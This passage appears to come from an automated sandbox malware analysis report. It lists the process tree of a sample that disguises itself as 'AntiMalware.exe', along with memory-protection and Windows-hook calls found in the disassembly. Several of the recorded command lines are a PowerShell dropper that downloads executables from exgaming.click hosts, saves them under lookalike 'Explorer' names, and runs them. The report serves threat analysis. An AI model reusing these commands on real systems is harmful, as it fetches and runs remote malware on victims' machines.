                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            Imagebase:0x7b0000
                            File size:76'288 bytes
                            MD5 hash:9F7B2BF836C0E9682F7F612FC60D88F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:19
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:03:46:56
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:03:46:57
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:03:46:58
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:03:46:59
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:03:47:01
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:03:47:02
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:24.5%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:5
                              Total number of Limit Nodes:1
                              execution_graph 1948 7ff848f43dce 1950 7ff848f43dff 1948->1950 1949 7ff848f43f6b 1950->1949 1951 7ff848f440f4 NtProtectVirtualMemory 1950->1951 1952 7ff848f44135 1951->1952

                              Executed Functions

                              Function 00007FF848F43DCE Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 443nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2017059843.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff848f40000_ZzOTKK2V8l.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: H$HAH$HAH
                              • API String ID: 2706961497-375035555
                              • Opcode ID: 870a26bcb9b76dc3ac40d59e03e466c35688e7fa5c939b6ae94ae5f94c7feb56
                              • Instruction ID: 8bcce83ee954596e6d42c86769a6245642548d8817b918899fc985198eda8ead
                              • Opcode Fuzzy Hash: 870a26bcb9b76dc3ac40d59e03e466c35688e7fa5c939b6ae94ae5f94c7feb56
                              • Instruction Fuzzy Hash: 4FC1763191DB495FE71DEB2888162FA77E1EFA5720F0441BED08AC31D7DE28680A8781

                              Non-executed Functions

                              Function 00007FF848F436DD Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2017059843.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff848f40000_ZzOTKK2V8l.jbxd
                              Similarity
                              • API ID:
                              • String ID: HAH$HAH$jR_H
                              • API String ID: 0-1375340356
                              • Opcode ID: 7f7d48686cbb52fd5785796a362e04af3fa649aef00e5014a1eee0a91213353a
                              • Instruction ID: f7c0c51e1afefa90fd2b30800342a8c2c1757aa56fc5b3d5ffc29946facd94e9
                              • Opcode Fuzzy Hash: 7f7d48686cbb52fd5785796a362e04af3fa649aef00e5014a1eee0a91213353a
                              • Instruction Fuzzy Hash: 88A14732E2DA4A5FF31CAB3898565FA77D1EFA9650F04027FD04AC31D7EE2868068341

                              Execution Graph

                              Execution Coverage:25.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:5
                              Total number of Limit Nodes:1
                              execution_graph 1528 7ff848f33e3e 1529 7ff848f33e6f 1528->1529 1530 7ff848f33fdb 1529->1530 1531 7ff848f34164 NtProtectVirtualMemory 1529->1531 1532 7ff848f341a5 1531->1532

                              Executed Functions

                              Function 00007FF848F33E3E Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 446nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2099390869.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7ff848f30000_AntiMalware.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: H$HAH$HAH
                              • API String ID: 2706961497-375035555
                              • Opcode ID: 76c97b493aef54e47bf70f3aa0d20dd73e56a36869b3aabc4c8fcdd9a53c4bf1
                              • Instruction ID: a6d2e3c7366a8385b0372c29666660d6844205d6daa7c17f8bf0f7637966b884
                              • Opcode Fuzzy Hash: 76c97b493aef54e47bf70f3aa0d20dd73e56a36869b3aabc4c8fcdd9a53c4bf1
                              • Instruction Fuzzy Hash: D4C16831A1DA495FE71DEB7898162FA37E1EF95350F0442BFE08AC31D7DE2868068781

                              Execution Graph

                              Execution Coverage:20.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:8
                              Total number of Limit Nodes:1
                              execution_graph 7282 7ff848f15168 7283 7ff848f15171 SetWindowsHookExW 7282->7283 7285 7ff848f15241 7283->7285 7277 7ff848f13e3e 7279 7ff848f13e6f 7277->7279 7278 7ff848f13fdb 7279->7278 7280 7ff848f14164 NtProtectVirtualMemory 7279->7280 7281 7ff848f141a5 7280->7281

                              Executed Functions

                              Function 00007FF848F13E3E Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 446nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000012.00000002.4435575719.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_2_7ff848f10000_AntiMalware.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: HAH$HAH
                              • API String ID: 2706961497-524784639
                              • Opcode ID: 317ba844108585cef5a38c24e0dfb270f679c2fdae0c86a7a19ffc922336e230
                              • Instruction ID: 97ea83b352b9f51c931989e344f0b8fe9cbd7a5045c9af82b0d6be1d5e3f43bc
                              • Opcode Fuzzy Hash: 317ba844108585cef5a38c24e0dfb270f679c2fdae0c86a7a19ffc922336e230
                              • Instruction Fuzzy Hash: 02C1663191DB495FE71DEB3898162FA77E1EF95360F0442BEE08AC31D7DE2868068781
                              Function 00007FF848F15168 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1065 7ff848f15168-7ff848f1516f 1066 7ff848f1517a-7ff848f151ed 1065->1066 1067 7ff848f15171-7ff848f15179 1065->1067 1071 7ff848f15279-7ff848f1527d 1066->1071 1072 7ff848f151f3-7ff848f151f8 1066->1072 1067->1066 1073 7ff848f15202-7ff848f1523f SetWindowsHookExW 1071->1073 1076 7ff848f151ff-7ff848f15200 1072->1076 1074 7ff848f15241 1073->1074 1075 7ff848f15247-7ff848f15278 1073->1075 1074->1075 1076->1073
                              APIs
                              Memory Dump Source
                              • Source File: 00000012.00000002.4435575719.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_2_7ff848f10000_AntiMalware.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: 1b5416ceca8645a1575f544fc64301f8b5c528aa4f23f7ee062cb29d34acdb4e
                              • Instruction ID: a76f1e759617823b3e6fa8fba7258b7d995ca3a32f11cf74d80d98defd6e3f57
                              • Opcode Fuzzy Hash: 1b5416ceca8645a1575f544fc64301f8b5c528aa4f23f7ee062cb29d34acdb4e
                              • Instruction Fuzzy Hash: 30412931A1CA4C4FDB58EB6C98066F9BBE1EF59321F00027ED009D3292CB74A852C7D5